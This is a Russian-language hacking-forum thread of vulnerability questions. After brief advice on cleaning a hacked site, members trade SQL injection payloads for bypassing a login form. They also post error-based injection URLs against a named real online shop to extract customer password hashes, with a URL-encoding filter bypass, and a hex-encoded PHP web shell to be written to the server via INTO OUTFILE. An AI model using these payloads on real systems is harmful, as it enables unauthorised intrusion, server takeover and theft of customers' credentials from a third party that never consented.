Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    посмотрите даты изменения файлов, бэкдоры вида <? eval($_GET[q]); ?>, конфигурацию всего сервера (устаревшая? вомзожно стоит накатить секурные апдейты?), если cms, тоже обновить. также изучайте логи и смотрите, куда имеено залились. ну и конечно, советую обратиться к спецалисту, например вот
     
    _________________________
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Сколько у вас сайтов на одном аккаунте? если несколько то их все разом чистить надо, но читска, как токовой не устронит проблему, нужно искать ее корень и проводить профилактические меры по предотвращению подобных ситуаций!
     
    _________________________
  3. ghost1k

    ghost1k New Member

    Joined:
    4 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ответил в ЛС
     
  4. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    чем же можно зашифровать данные поступающие в базу ?
    кроме пароля открытые остаются email - они же логины, телефоны, номера карт например
    и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    например mcrypt .
     
    _________________________
    1 person likes this.
  6. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK
    зашифровать так же как и пароль wifi точки !
     
  7. Han

    Han New Member

    Joined:
    2 Mar 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Создаю пост запрос:
    login=Admin'+--+\&pass=123
    Слэш вызывает ошибку:
    WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1

    Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?

    P.S.
    Пробовал.(
     
    #23607 Han, 4 Nov 2014
    Last edited: 4 Nov 2014
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    # например еще
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
     
    _________________________
  10. Han

    Han New Member

    Joined:
    2 Mar 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
  11. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359

    Code:
    login=Admin'+or+login+='[B]bad_login_name[/B]&pass=[B]any[/B]
    bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any
     
    _________________________
  12. Han

    Han New Member

    Joined:
    2 Mar 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Не помогло.
    В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?
     
    #23612 Han, 5 Nov 2014
    Last edited: 5 Nov 2014
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    кавычки не экранируются и не фильтруются. попробуйте
    Code:
    SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' --
    это равносильно запросу
    Code:
    SELECT * FROM users WHERE login='Admin' AND TRUE
    поэтому будет выборка из таблицы, где значение колонки login == Admin.
     
    _________________________
  14. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    да, это фильтрация.... там походу только слеш не фильтруется :mad:
     
    _________________________
  15. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Есть Error based Injection.
    Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм
    Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать? :)

    норм
    HTML:
    _http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1
    ошибка
    HTML:
    http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
     
    #23615 Br@!ns, 6 Nov 2014
    Last edited by a moderator: 7 Nov 2014
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    действительно фильтр на имя бд. помогло урл кодирование:
    Code:
    http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+forma%67%67iodb_osc.customers+limit+0,1))))=1
    где %6767 = gg, то есть имя бд formaggiodb_osc :)
     
    _________________________
    1 person likes this.
  17. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.
    делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --
    Файл не заливается.
    По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
     
  18. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    https://forum.antichat.ru/showpost.php?p=663815&postcount=39
    https://forum.antichat.ru/threadnav34338-1-10.html

    соответственно, mg=on и mq=off
     
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?
     
  20. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    php+curl
     
Thread Status:
Not open for further replies.